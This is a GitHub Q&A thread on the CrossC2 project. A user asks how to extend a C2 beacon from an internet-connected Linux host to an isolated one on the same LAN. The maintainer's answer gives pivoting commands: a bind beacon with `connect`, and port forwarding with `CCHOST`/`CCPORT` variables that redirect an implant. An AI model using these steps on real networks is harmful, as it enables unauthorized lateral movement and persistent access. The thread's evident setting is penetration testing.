### DISCUSSION TITLE
Can anyone pease help me setup a beacon peer?

### DISCUSSION THREAD

**Discussion by pentester2222** [gloxec/CrossC2#201] [Q&A] [answered]
Here is my scinario I would like to test:
1. There are two Linux VMs in Same network(LAN), For example Server1 and Server2. 
2. Server1 has Internet Access and Server2 does not have Internet Access, while Server1 and Server2 can communicate via the Private IP. 
3. If I generate a beacon and execute it on Server1 it is communicating to team server via the internet without any issue, It is possible to connect/get access to Server2 via the Server1? if so what are the possible options and way to generate the beacon and execute that in Server2. Anyone can help on this please? 
Thanks,

**Comment by gloxec** [comment, marked as answer]
There are two possible solutions here:

Suppose Server1's IP = 10.0.0.4, Server2's IP = 10.0.0.5

1. Generate a linux-bind type beacon, and then run `./bind-beacon <4444>` on Server2 (when the port is not specified, the default is 4444 listening port), and then on the session of Server1, run `connect 10.0.0.5:4444`. In this way, a child node session of server2 can be obtained, and simple shell commands can be executed 

2. Perform port forwarding on Server1, use `iptables` or other open source tools, and then regenerate the beacon pointing to Server1 IP(10.0.0.4). Or use environment variables to change communication `export CCHOST=10.0.0.4 && export CCPORT=1443 && /tmp/c2`
